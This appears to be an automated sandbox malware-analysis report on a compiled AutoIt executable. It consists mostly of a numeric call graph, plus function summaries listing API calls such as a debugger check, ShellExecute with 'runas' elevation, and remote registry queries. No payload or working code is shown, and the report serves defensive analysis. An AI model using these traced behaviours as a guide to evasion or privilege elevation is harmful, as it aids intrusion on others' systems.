109851 78100d 109850->109851 109907 78e08f 109851->109907 109855 781063 109927 7bd520 86 API calls 4 library calls 109855->109927 109856 77fbf1 Mailbox 109858 78105e 109863 77c935 48 API calls 109858->109863 109860 780dee 109864 77d89e 50 API calls 109860->109864 109861 79010a 48 API calls 109887 77fad8 Mailbox _memmove 109861->109887 109862 780119 109928 7bd520 86 API calls 4 library calls 109862->109928 109863->109856 109865 780dfa 109864->109865 109866 77d89e 50 API calls 109865->109866 109870 780e83 109866->109870 109867 77f6d0 417 API calls 109867->109887 109868 77c935 48 API calls 109868->109887 109869 7eb772 109929 7bd520 86 API calls 4 library calls 109869->109929 109875 77caee 48 API calls 109870->109875 109871 77d3d2 48 API calls 109871->109887 109873 791b2a 52 API calls __cinit 109873->109887 109874 7eb7d2 109885 7810f1 Mailbox 109875->109885 109879 78103d 109879->109856 109926 7bd520 86 API calls 4 library calls 109879->109926 109880 77fa40 417 API calls 109880->109887 109883 7eb583 109924 7bd520 86 API calls 4 library calls 109883->109924 109925 7bd520 86 API calls 4 library calls 109885->109925 109886 7aa599 InterlockedDecrement 109886->109887 109887->109855 109887->109856 109887->109858 109887->109860 109887->109861 109887->109862 109887->109865 109887->109867 109887->109868 109887->109869 109887->109870 109887->109871 109887->109873 109887->109879 109887->109880 109887->109883 109887->109885 109887->109886 109888 7c013f 87 API calls 109887->109888 109889 7d1f19 132 API calls 109887->109889 109890 78f03e 2 API calls 109887->109890 109891 7d0bfa 129 API calls 109887->109891 109892 7d798d 109 API calls 109887->109892 109893 7d30ad 93 API calls 109887->109893 109894 7781c6 85 API calls 109887->109894 109895 7d804e 113 API calls 109887->109895 109896 7c936f 55 API calls 109887->109896 109897 7750a3 49 API calls 109887->109897 109898 78ef0d 94 API calls 109887->109898 109899 7cb74b 417 API calls 109887->109899 109900 7d17aa 87 API calls 109887->109900 109901 7d10e5 82 API calls 109887->109901 109902 78f461 98 API calls 109887->109902 109903 7c8065 55 API calls 109887->109903 109904 7c92c0 88 API calls 109887->109904 109905 78dd84 3 API calls 109887->109905 109906 7c9122 91 API calls 109887->109906 109919 781620 59 API calls Mailbox 109887->109919 109920 7cee52 82 API calls 2 library calls 109887->109920 109921 7cef9d 90 API calls Mailbox 109887->109921 109922 7bb020 48 API calls 109887->109922 109923 7ce713 417 API calls Mailbox 109887->109923 109888->109887 109889->109887 109890->109887 109891->109887 109892->109887 109893->109887 109894->109887 109895->109887 109896->109887 109897->109887 109898->109887 109899->109887 109900->109887 109901->109887 109902->109887 109903->109887 109904->109887 109905->109887 109906->109887 109908 777b6e 48 API calls 109907->109908 109909 78e0b4 _wcscmp 109908->109909 109910 77caee 48 API calls 109909->109910 109912 78e0e2 Mailbox 109909->109912 109911 7eb9c7 109910->109911 109930 777b4b 48 API calls Mailbox 109911->109930 109912->109887 109914 7eb9d5 109915 77d2d2 53 API calls 109914->109915 109916 7eb9e7 109915->109916 109917 77d89e 50 API calls 109916->109917 109918 7eb9ec Mailbox 109916->109918 109917->109918 109918->109887 109919->109887 109920->109887 109921->109887 109922->109887 109923->109887 109924->109885 109925->109856 109926->109855 109927->109862 109928->109869 109929->109874 109930->109914 109931 7e1eed 109936 78e975 109931->109936 109933 7e1f01 109952 791b2a 52 API calls __cinit 109933->109952 109935 7e1f0b 109937 79010a 48 API calls 109936->109937 109938 78ea27 GetModuleFileNameW 109937->109938 109939 79297d __wsplitpath 47 API calls 109938->109939 109940 78ea5b _wcsncat 109939->109940 109953 792bff 109940->109953 109943 79010a 48 API calls 109944 78ea94 _wcscpy 109943->109944 109945 77d3d2 48 API calls 109944->109945 109946 78eacf 109945->109946 109956 78eb05 109946->109956 109948 78eae0 Mailbox 109948->109933 109949 77a4f6 48 API calls 109950 78eada _wcscat __NMSG_WRITE _wcsncpy 109949->109950 109950->109948 109950->109949 109951 79010a 48 API calls 109950->109951 109951->109950 109952->109935 109970 79aab9 109953->109970 109957 77c4cd 48 API calls 109956->109957 109958 78eb14 RegOpenKeyExW 109957->109958 109959 7e4b17 RegQueryValueExW 109958->109959 109960 78eb35 109958->109960 109961 7e4b30 109959->109961 109962 7e4b91 RegCloseKey 109959->109962 109960->109950 109963 79010a 48 API calls 109961->109963 109964 7e4b49 109963->109964 109965 774bce 48 API calls 109964->109965 109966 7e4b53 RegQueryValueExW 109965->109966 109967 7e4b6f 109966->109967 109969 7e4b86 109966->109969 109968 777e53 48 API calls 109967->109968 109968->109969 109969->109962 109971 79aaca 109970->109971 109972 79abc6 109970->109972 109971->109972 109975 79aad5 109971->109975 109980 79889e 47 API calls __getptd_noexit 109972->109980 109974 79abbb 109981 797aa0 8 API calls ___wstrgtold12_l 109974->109981 109977 78ea8a 109975->109977 109979 79889e 47 API calls __getptd_noexit 109975->109979 109977->109943 109979->109974 109980->109974 109981->109977 109982 7e1eca 109987 78be17 109982->109987 109986 7e1ed9 109988 77d3d2 48 API calls 109987->109988 109989 78be85 109988->109989 109995 78c929 109989->109995 109991 78bf3e 109994 791b2a 52 API calls __cinit 109991->109994 109992 78bf22 109992->109991 109998 78c8b7 48 API calls _memmove 109992->109998 109994->109986 109999 78c955 109995->109999 109998->109992 110000 78c962 109999->110000 110002 78c948 109999->110002 110001 78c969 RegOpenKeyExW 110000->110001 110000->110002 110001->110002 110003 78c983 RegQueryValueExW 110001->110003 110002->109992 110004 78c9b9 RegCloseKey 110003->110004 110005 78c9a4 110003->110005 110004->110002 110005->110004 110006 7e1e8b 110011 78e44f 110006->110011 110010 7e1e9a 110012 79010a 48 API calls 110011->110012 110013 78e457 110012->110013 110014 78e46b 110013->110014 110019 78e74b 110013->110019 110018 791b2a 52 API calls __cinit 110014->110018 110018->110010 110020 78e754 110019->110020 110021 78e463 110019->110021 110051 791b2a 52 API calls __cinit 110020->110051 110023 78e47b 110021->110023 110024 77d3d2 48 API calls 110023->110024 110025 78e492 GetVersionExW 110024->110025 110026 777e53 48 API calls 110025->110026 110027 78e4d5 110026->110027 110052 78e5f8 110027->110052 110030 78e617 48 API calls 110033 78e4e9 110030->110033 110032 7e29f9 110033->110032 110056 78e6d1 110033->110056 110035 78e55f GetCurrentProcess 110065 78e70e LoadLibraryA GetProcAddress 110035->110065 110037 78e5ec GetSystemInfo 110039 78e5c9 110037->110039 110038 78e59e 110059 78e694 110038->110059 110041 78e5dc 110039->110041 110042 78e5d7 FreeLibrary 110039->110042 110041->110014 110042->110041 110044 78e5e4 GetSystemInfo 110046 78e5be 110044->110046 110045 78e5b4 110062 78e437 110045->110062 110046->110039 110050 78e5c4 FreeLibrary 110046->110050 110047 78e576 110047->110037 110047->110038 110050->110039 110051->110021 110053 78e601 110052->110053 110054 77a2fb 48 API calls 110053->110054 110055 78e4dd 110054->110055 110055->110030 110066 78e6e3 110056->110066 110070 78e6a6 110059->110070 110063 78e694 2 API calls 110062->110063 110064 78e43f GetNativeSystemInfo 110063->110064 110064->110046 110065->110047 110067 78e55b 110066->110067 110068 78e6ec LoadLibraryA 110066->110068 110067->110035 110067->110047 110068->110067 110069 78e6fd GetProcAddress 110068->110069 110069->110067 110071 78e5ac 110070->110071 110072 78e6af LoadLibraryA 110070->110072 110071->110044 110071->110045 110072->110071 110073 78e6c0 GetProcAddress 110072->110073 110073->110071 110074 7729c2 110075 7729cb 110074->110075 110076 7729e9 110075->110076 110077 772a48 110075->110077 110115 772a46 110075->110115 110081 7729f6 110076->110081 110082 772aac PostQuitMessage 110076->110082 110079 7e2307 110077->110079 110080 772a4e 110077->110080 110078 772a2b NtdllDefWindowProc_W 110103 772a39 110078->110103 110129 77322e 16 API calls 110079->110129 110083 772a76 SetTimer RegisterClipboardFormatW 110080->110083 110084 772a53 110080->110084 110086 7e238f 110081->110086 110087 772a01 110081->110087 110082->110103 110091 772a9f CreatePopupMenu 110083->110091 110083->110103 110088 7e22aa 110084->110088 110089 772a5a KillTimer 110084->110089 110135 7b57fb 60 API calls _memset 110086->110135 110092 772ab6 110087->110092 110093 772a09 110087->110093 110096 7e22af 110088->110096 110097 7e22e3 MoveWindow 110088->110097 110126 772b94 Shell_NotifyIconW _memset 110089->110126 110090 7e232e 110130 78ec33 417 API calls Mailbox 110090->110130 110091->110103 110119 771e58 110092->110119 110100 772a14 110093->110100 110101 7e2374 110093->110101 110104 7e22d2 SetFocus 110096->110104 110105 7e22b3 110096->110105 110097->110103 110107 772a1f 110100->110107 110108 7e235f 110100->110108 110101->110078 110134 7ab31f 48 API calls 110101->110134 110102 7e23a1 110102->110078 110102->110103 110104->110103 110105->110107 110109 7e22bc 110105->110109 110106 772a6d 110127 772ac7 DeleteObject DestroyWindow Mailbox 110106->110127 110107->110078 110131 772b94 Shell_NotifyIconW _memset 110107->110131 110133 7b5fdb 70 API calls _memset 110108->110133 110128 77322e 16 API calls 110109->110128 110114 7e236f 110114->110103 110115->110078 110117 7e2353 110132 773598 67 API calls _memset 110117->110132 110120 771ef1 110119->110120 110121 771e6f _memset 110119->110121 110120->110103 110136 7738e4 110121->110136 110123 771e96 110124 771eda KillTimer SetTimer 110123->110124 110125 7e4518 Shell_NotifyIconW 110123->110125 110124->110120 110125->110124 110126->110106 110127->110103 110128->110103 110129->110090 110130->110107 110131->110117 110132->110115 110133->110114 110134->110115 110135->110102 110137 7739d5 Mailbox 110136->110137 110138 773900 110136->110138 110137->110123 110139 777b6e 48 API calls 110138->110139 110140 77390e 110139->110140 110141 7e453f LoadStringW 110140->110141 110142 77391b 110140->110142 110144 7e4559 110141->110144 110143 777e53 48 API calls 110142->110143 110145 773930 110143->110145 110159 7739e8 48 API calls 2 library calls 110144->110159 110145->110144 110146 773941 110145->110146 110148 77394b 110146->110148 110149 7739da 110146->110149 110158 7739e8 48 API calls 2 library calls 110148->110158 110152 77c935 48 API calls 110149->110152 110150 7e4564 110153 773956 _memset _wcscpy 110150->110153 110154 7e4578 110150->110154 110152->110153 110157 7739ba Shell_NotifyIconW 110153->110157 110160 7739e8 48 API calls 2 library calls 110154->110160 110156 7e4586 110157->110137 110158->110153 110159->110150 110160->110156 110161 7ec146 GetUserNameW 110162 796a80 110163 796a8c __wsopen_helper 110162->110163 110199 798b7b GetStartupInfoW 110163->110199 110165 796a91 110201 79a937 GetProcessHeap 110165->110201 110167 796ae9 110168 796af4 110167->110168 110286 796bd0 47 API calls 3 library calls 110167->110286 110202 7987d7 110168->110202 110171 796afa 110172 796b05 __RTC_Initialize 110171->110172 110287 796bd0 47 API calls 3 library calls 110171->110287 110223 79ba66 110172->110223 110175 796b14 110176 796b20 GetCommandLineW 110175->110176 110288 796bd0 47 API calls 3 library calls 110175->110288 110242 7a3c2d GetEnvironmentStringsW 110176->110242 110179 796b1f 110179->110176 110183 796b45 110255 7a3a64 110183->110255 110186 796b4b 110187 796b56 110186->110187 110290 791d7b 47 API calls 3 library calls 110186->110290 110269 791db5 110187->110269 110190 796b5e 110191 796b69 __wwincmdln 110190->110191 110291 791d7b 47 API calls 3 library calls 110190->110291 110200 798b91 110199->110200 110200->110165 110201->110167 110294 791e5a 30 API calls 2 library calls 110202->110294 110204 7987dc 110295 798ab3 InitializeCriticalSectionAndSpinCount 110204->110295 110206 7987e1 110207 7987e5 110206->110207 110297 798afd TlsAlloc 110206->110297 110296 79884d 50 API calls 2 library calls 110207->110296 110210 7987ea 110210->110171 110211 7987f7 110211->110207 110212 798802 110211->110212 110298 797616 110212->110298 110215 798844 110306 79884d 50 API calls 2 library calls 110215->110306 110218 798823 110218->110215 110220 798829 110218->110220 110219 798849 110219->110171 110305 798724 47 API calls 4 library calls 110220->110305 110222 798831 GetCurrentThreadId 110222->110171 110224 79ba72 __wsopen_helper 110223->110224 110315 798984 110224->110315 110226 79ba79 110227 797616 __calloc_crt 47 API calls 110226->110227 110228 79ba8a 110227->110228 110229 79baf5 GetStartupInfoW 110228->110229 110230 79ba95 __wsopen_helper @_EH4_CallFilterFunc@8 110228->110230 110237 79bb0a 110229->110237 110238 79bc33 110229->110238 110230->110175 110231 79bcf7 110322 79bd0b RtlLeaveCriticalSection _doexit 110231->110322 110233 79bc7c GetStdHandle 110233->110238 110234 79bb58 110234->110238 110240 79bb98 InitializeCriticalSectionAndSpinCount 110234->110240 110241 79bb8a GetFileType 110234->110241 110235 797616 __calloc_crt 47 API calls 110235->110237 110236 79bc8e GetFileType 110236->110238 110237->110234 110237->110235 110237->110238 110238->110231 110238->110233 110238->110236 110239 79bcbb InitializeCriticalSectionAndSpinCount 110238->110239 110239->110238 110240->110234 110241->110234 110241->110240 110243 7a3c3e 110242->110243 110244 796b30 110242->110244 110361 797660 47 API calls std::exception::_Copy_str 110243->110361 110249 7a382b GetModuleFileNameW 110244->110249 110247 7a3c7a FreeEnvironmentStringsW 110247->110244 110248 7a3c64 _memmove 110248->110247 110250 7a385f _wparse_cmdline 110249->110250 110251 796b3a 110250->110251 110252 7a3899 110250->110252 110251->110183 110289 791d7b 47 API calls 3 library calls 110251->110289 110362 797660 47 API calls std::exception::_Copy_str 110252->110362 110254 7a389f _wparse_cmdline 110254->110251 110256 7a3a7d __NMSG_WRITE 110255->110256 110257 7a3a75 110255->110257 110258 797616 __calloc_crt 47 API calls 110256->110258 110257->110186 110262 7a3aa6 __NMSG_WRITE 110258->110262 110259 7a3afd 110260 7928ca _free 47 API calls 110259->110260 110260->110257 110261 797616 __calloc_crt 47 API calls 110261->110262 110262->110257 110262->110259 110262->110261 110263 7a3b22 110262->110263 110266 7a3b39 110262->110266 110363 7a3317 47 API calls ___wstrgtold12_l 110262->110363 110264 7928ca _free 47 API calls 110263->110264 110264->110257 110364 797ab0 IsProcessorFeaturePresent 110266->110364 110270 791dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 110269->110270 110272 791e00 __IsNonwritableInCurrentImage 110270->110272 110387 791b2a 52 API calls __cinit 110270->110387 110272->110190 110286->110168 110287->110172 110288->110179 110294->110204 110295->110206 110296->110210 110297->110211 110301 79761d 110298->110301 110300 79765a 110300->110215 110304 798b59 TlsSetValue 110300->110304 110301->110300 110302 79763b Sleep 110301->110302 110307 7a3e5a 110301->110307 110303 797652 110302->110303 110303->110300 110303->110301 110304->110218 110305->110222 110306->110219 110308 7a3e65 110307->110308 110313 7a3e80 __calloc_impl 110307->110313 110309 7a3e71 110308->110309 110308->110313 110314 79889e 47 API calls __getptd_noexit 110309->110314 110311 7a3e90 RtlAllocateHeap 110312 7a3e76 110311->110312 110311->110313 110312->110301 110313->110311 110313->110312 110314->110312 110316 7989a8 RtlEnterCriticalSection 110315->110316 110317 798995 110315->110317 110316->110226 110323 798a0c 110317->110323 110319 79899b 110319->110316 110347 791d7b 47 API calls 3 library calls 110319->110347 110322->110230 110324 798a18 __wsopen_helper 110323->110324 110325 798a39 110324->110325 110326 798a21 110324->110326 110328 798a37 110325->110328 110334 798aa1 __wsopen_helper 110325->110334 110348 798e52 47 API calls __NMSG_WRITE 110326->110348 110328->110325 110351 797660 47 API calls std::exception::_Copy_str 110328->110351 110329 798a26 110349 798eb2 47 API calls 5 library calls 110329->110349 110332 798a4d 110335 798a63 110332->110335 110336 798a54 110332->110336 110333 798a2d 110350 791d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 110333->110350 110334->110319 110338 798984 __lock 46 API calls 110335->110338 110352 79889e 47 API calls __getptd_noexit 110336->110352 110341 798a6a 110338->110341 110340 798a59 110340->110334 110342 798a79 InitializeCriticalSectionAndSpinCount 110341->110342 110343 798a8e 110341->110343 110344 798a94 110342->110344 110353 7928ca 110343->110353 110359 798aaa RtlLeaveCriticalSection _doexit 110344->110359 110348->110329 110349->110333 110351->110332 110352->110340 110354 7928d3 RtlFreeHeap 110353->110354 110358 7928fc _free 110353->110358 110355 7928e8 110354->110355 110354->110358 110360 79889e 47 API calls __getptd_noexit 110355->110360 110357 7928ee GetLastError 110357->110358 110358->110344 110359->110334 110360->110357 110361->110248 110362->110254 110363->110262 110365 797abb 110364->110365 110370 797945 110365->110370 110371 79795f _memset __call_reportfault 110370->110371 110387->110272 111117 7ebc25 111118 7ebc27 111117->111118 111121 7b79f8 SHGetFolderPathW 111118->111121 111122 777e53 48 API calls 111121->111122 111123 7b7a25 111122->111123 111124 77e8eb 111125 782b40 417 API calls 111124->111125 111126 77e8f7 111125->111126 111127 77e849 111130 7826c0 111127->111130 111129 77e852 111131 7e862d 111130->111131 111132 78273b 111130->111132 111252 7bd520 86 API calls 4 library calls 111131->111252 111134 782adc 111132->111134 111135 78277c 111132->111135 111144 78279a 111132->111144 111251 77d349 53 API calls 111134->111251 111175 7828f6 111135->111175 111247 77d500 53 API calls __cinit 111135->111247 111136 7e863e 111253 7bd520 86 API calls 4 library calls 111136->111253 111137 7827cf 111137->111136 111140 7827db 111137->111140 111138 782a84 111147 77d380 55 API calls 111138->111147 111142 7827ef 111140->111142 111152 7e865a 111140->111152 111145 7e86c9 111142->111145 111146 782806 111142->111146 111144->111137 111144->111138 111160 782914 111144->111160 111148 7e8ac9 111145->111148 111151 77fa40 417 API calls 111145->111151 111149 77fa40 417 API calls 111146->111149 111150 782aab 111147->111150 111268 7bd520 86 API calls 4 library calls 111148->111268 111189 78281d 111149->111189 111154 77d2d2 53 API calls 111150->111154 111155 7e86ee 111151->111155 111152->111145 111171 7829ec 111152->111171 111254 7cf211 417 API calls 111152->111254 111255 7cf4df 417 API calls 111152->111255 111154->111160 111162 77d89e 50 API calls 111155->111162 111167 7e870a 111155->111167 111155->111171 111157 7e8980 111263 7bd520 86 API calls 4 library calls 111157->111263 111163 77cdb4 48 API calls 111160->111163 111161 782836 111161->111148 111165 77fa40 417 API calls 111161->111165 111162->111167 111169 78296e 111163->111169 111164 7828cc 111164->111175 111248 77cf97 58 API calls 111164->111248 111191 78287c 111165->111191 111166 77c935 48 API calls 111166->111161 111174 7e878d 111167->111174 111256 77346e 48 API calls 111167->111256 111169->111171 111179 782984 111169->111179 111180 7e8a97 111169->111180 111186 7e89b4 111169->111186 111170 7828ac 111170->111164 111261 77cf97 58 API calls 111170->111261 111171->111129 111173 7e883f 111259 7cc235 417 API calls Mailbox 111173->111259 111174->111173 111178 7e882d 111174->111178 111257 7b4e71 53 API calls __cinit 111174->111257 111184 782900 111175->111184 111262 77cf97 58 API calls 111175->111262 111181 77ca8e 48 API calls 111178->111181 111179->111180 111249 7841fc 84 API calls 111179->111249 111180->111171 111267 774b02 50 API calls 111180->111267 111181->111173 111182 7e8888 111188 7e888c 111182->111188 111182->111189 111184->111157 111184->111160 111233 7cbf80 111186->111233 111260 7bd520 86 API calls 4 library calls 111188->111260 111189->111161 111189->111166 111189->111171 111191->111170 111191->111171 111195 77fa40 417 API calls 111191->111195 111192 7829b8 111194 7e8a7e 111192->111194 111250 7841fc 84 API calls 111192->111250 111266 78ee93 84 API calls 111194->111266 111200 7e88ff 111195->111200 111196 7e8725 111196->111178 111208 7814a0 48 API calls 111196->111208 111200->111171 111207 77d89e 50 API calls 111200->111207 111201 7e89f3 111214 7e8a42 111201->111214 111215 7e8a01 111201->111215 111202 7e8813 111205 77d89e 50 API calls 111202->111205 111203 7e87ca 111203->111202 111206 7784a6 81 API calls 111203->111206 111204 7829ca 111204->111171 111210 7e8a6f 111204->111210 111211 7829e5 111204->111211 111209 7e8821 111205->111209 111222 7e87e0 111206->111222 111207->111170 111212 7e875d 111208->111212 111213 77d89e 50 API calls 111209->111213 111265 7cd1da 50 API calls 111210->111265 111216 79010a 48 API calls 111211->111216 111212->111178 111220 7814a0 48 API calls 111212->111220 111213->111178 111218 77d89e 50 API calls 111214->111218 111217 77ca8e 48 API calls 111215->111217 111216->111171 111217->111171 111221 7e8a4b 111218->111221 111223 7e8775 111220->111223 111224 77d89e 50 API calls 111221->111224 111222->111202 111258 7ba76d 49 API calls 111222->111258 111227 77d89e 50 API calls 111223->111227 111228 7e8a57 111224->111228 111226 7e8807 111229 77d89e 50 API calls 111226->111229 111230 7e8781 111227->111230 111264 774b02 50 API calls 111228->111264 111229->111202 111232 77d89e 50 API calls 111230->111232 111232->111174 111238 7cbfd9 _memset 111233->111238 111235 7cc22e 111235->111201 111236 7cc14c 111237 7cc19f VariantInit VariantClear 111236->111237 111241 7cc033 111236->111241 111239 7cc1c5 111237->111239 111238->111236 111240 7cc097 VariantInit 111238->111240 111238->111241 111239->111241 111243 7cc1e6 111239->111243 111242 7cc0d6 111240->111242 111271 7cc235 417 API calls Mailbox 111241->111271 111242->111241 111269 7ba6f6 103 API calls 111242->111269 111270 7ba6f6 103 API calls 111243->111270 111245 7cc20d VariantClear 111245->111235 111247->111144 111248->111175 111249->111192 111250->111204 111251->111170 111252->111136 111253->111152 111254->111152 111255->111152 111256->111196 111257->111203 111258->111226 111259->111182 111260->111171 111261->111164 111262->111184 111263->111171 111264->111171 111265->111194 111266->111180 111267->111148 111268->111171 111269->111236 111270->111245 111271->111235

                                        Executed Functions

                                        Function 0077374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0077376D
                                          • Part of subcall function 00774257: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI77F6.tmp,00000104,?,00000000,00000001,00000000), ref: 0077428C
                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 0077377F
                                        • GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI77F6.tmp,00000104,?,00831120,C:\Windows\Installer\MSI77F6.tmp,00831124,?,?), ref: 007737EE
                                          • Part of subcall function 007734F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0077352A
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00773860
                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00822934,00000010), ref: 007E21C5
                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 007E21FD
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 007E2232
                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0080DAA4), ref: 007E2290
                                        • ShellExecuteW.SHELL32(00000000), ref: 007E2297
                                          • Part of subcall function 007730A5: GetSysColorBrush.USER32(0000000F), ref: 007730B0
                                          • Part of subcall function 007730A5: LoadCursorW.USER32(00000000,00007F00), ref: 007730BF
                                          • Part of subcall function 007730A5: LoadIconW.USER32(00000063), ref: 007730D5
                                          • Part of subcall function 007730A5: LoadIconW.USER32(000000A4), ref: 007730E7
                                          • Part of subcall function 007730A5: LoadIconW.USER32(000000A2), ref: 007730F9
                                          • Part of subcall function 007730A5: RegisterClassExW.USER32(?), ref: 00773167
                                          • Part of subcall function 00772E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00772ECB
                                          • Part of subcall function 00772E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00772EEC
                                          • Part of subcall function 00772E9D: ShowWindow.USER32(00000000), ref: 00772F00
                                          • Part of subcall function 00772E9D: ShowWindow.USER32(00000000), ref: 00772F09
                                          • Part of subcall function 00773598: _memset.LIBCMT ref: 007735BE
                                          • Part of subcall function 00773598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00773667
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                        • String ID: C:\Windows\Installer\MSI77F6.tmp$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                        • API String ID: 4253510256-3328431208
                                        • Opcode ID: f89bcb19020dac24d5d397b15c8f4663e6bc2f4e87773e9bd00ba9a6bb23c34d
                                        • Instruction ID: f5d0529b34cf4120254f9ca642934b6871f55b86ba7b7a7c4d66404e4bbb2d7d
                                        • Opcode Fuzzy Hash: f89bcb19020dac24d5d397b15c8f4663e6bc2f4e87773e9bd00ba9a6bb23c34d
                                        • Instruction Fuzzy Hash: C6514770644284FACF10ABA09C4EFFD7B69FB45B90F008056F749D2192D67C4A46EB72
                                        Function 007D30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1168 7d30ad-7d315b call 77ca8e call 77d3d2 * 3 call 7784a6 call 7d3d7b call 7d3af7 1183 7d315d-7d3161 1168->1183 1184 7d3166-7d3170 1168->1184 1185 7d31e6-7d31f2 call 7bd7e4 1183->1185 1186 7d31a2 1184->1186 1187 7d3172-7d3187 RegConnectRegistryW 1184->1187 1196 7d3504-7d3527 call 775cd3 * 3 1185->1196 1191 7d31a6-7d31c3 RegOpenKeyExW 1186->1191 1189 7d319c-7d31a0 1187->1189 1190 7d3189-7d319a call 777ba9 1187->1190 1189->1191 1190->1185 1194 7d31c5-7d31d7 call 777ba9 1191->1194 1195 7d31f7-7d3227 call 7784a6 RegQueryValueExW 1191->1195 1203 7d31d9-7d31dd RegCloseKey 1194->1203 1204 7d31e3-7d31e4 1194->1204 1205 7d323e-7d3254 call 777ba9 1195->1205 1206 7d3229-7d3239 call 777ba9 1195->1206 1203->1204 1204->1185 1216 7d34dc-7d34dd 1205->1216 1217 7d325a-7d325f 1205->1217 1215 7d34df-7d34e6 call 7bd7e4 1206->1215 1225 7d34eb-7d34fc RegCloseKey 1215->1225 1216->1215 1218 7d344c-7d3498 call 79010a call 7784a6 RegQueryValueExW 1217->1218 1219 7d3265-7d3268 1217->1219 1245 7d349a-7d34a6 1218->1245 1246 7d34b4-7d34ce call 777ba9 call 7bd7e4 1218->1246 1222 7d326e-7d3273 1219->1222 1223 7d33d9-7d3411 call 7bad14 call 7784a6 RegQueryValueExW 1219->1223 1226 7d338d-7d33d4 call 7784a6 RegQueryValueExW call 782570 1222->1226 1227 7d3279-7d327c 1222->1227 1223->1225 1247 7d3417-7d3447 call 777ba9 call 7bd7e4 call 782570 1223->1247 1225->1196 1229 7d34fe-7d3502 RegCloseKey 1225->1229 1226->1225 1231 7d32de-7d332b call 79010a call 7784a6 RegQueryValueExW 1227->1231 1232 7d327e-7d3281 1227->1232 1229->1196 1231->1246 1262 7d3331-7d3348 1231->1262 1232->1216 1236 7d3287-7d32d9 call 7784a6 RegQueryValueExW call 782570 1232->1236 1236->1225 1252 7d34aa-7d34b2 call 77ca8e 1245->1252 1263 7d34d3-7d34da call 79017e 1246->1263 1247->1225 1252->1263 1262->1252 1265 7d334e-7d3355 1262->1265 1263->1225 1266 7d335c-7d3361 1265->1266 1267 7d3357-7d3358 1265->1267 1270 7d3376-7d337b 1266->1270 1271 7d3363-7d3367 1266->1271 1267->1266 1270->1252 1276 7d3381-7d3388 1270->1276 1274 7d3369-7d336d 1271->1274 1275 7d3371-7d3374 1271->1275 1274->1275 1275->1270 1275->1271 1276->1252
                                        APIs
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D317F
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 007D321E
                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007D32B6
                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007D34F5
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007D3502
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
